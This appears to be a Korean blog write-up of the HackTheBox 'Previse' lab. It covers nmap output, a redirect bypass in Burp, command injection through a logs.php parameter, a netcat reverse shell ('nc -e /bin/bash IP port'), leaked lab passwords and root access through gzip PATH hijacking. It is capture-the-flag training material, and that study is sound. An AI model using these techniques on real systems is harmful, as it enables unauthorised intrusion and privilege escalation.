1. Reconnaissance

 

┌──(takudaddy㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p- 10.129.214.190
[sudo] password for takudaddy: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 20:07 EDT
Nmap scan report for 10.129.214.190
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php

 

 

 

further enum for port 80 :

 

 

 

 

 

 

어떤 메뉴를 누르던

로그인 페이지로 리다이렉션 됨

 

 

버프로 인터셉트 

 

 

forward

 

 

200 OK로 변경 후 forward

 

 

 

정상 접속

인터셉트 OFF로 바꾸고 유저 생성

 

 

생성한 유저로 로그인

 

 

 

 

 

2. INITIAL SHELL

 

 

파일 내려받고 unzip

root

mySQL_p@ssw0rd!:)

 

URL로 logs.php 경로에 접속하면 out.log 파일을 받을 수 있다 +

파라미터로 delim 을 사용

 

 

 

 

 

RCE 가능한지 테스트 : 실패

request 모드 바꾸고 다시 테스트

 

 

성공

 

 

 

리스너 기동 후 리버스쉘 실행

nc -e /bin/bash IP port

 

 

 

 

 

 

3. PRIVILEGE ESCALATION

 

크랙

ilovecody112235!

 

 

gzip 명령어가 root 권한으로 실행 -> Path Injection to getting root

 

 

리버스 쉘 명령어가 담긴 gzip 파일 생성 후 path변수 재설정

 

리스너 기동 후 실행하면

 

 

728x90

'OSCP > HacktheBox' 카테고리의 다른 글

18. Writer  (0) 2021.08.10
17. Archtype  (0) 2021.08.03
16. Love  (0) 2021.07.21
15. Armageddon  (0) 2021.07.20
14. Node  (0) 2021.04.24

+ Recent posts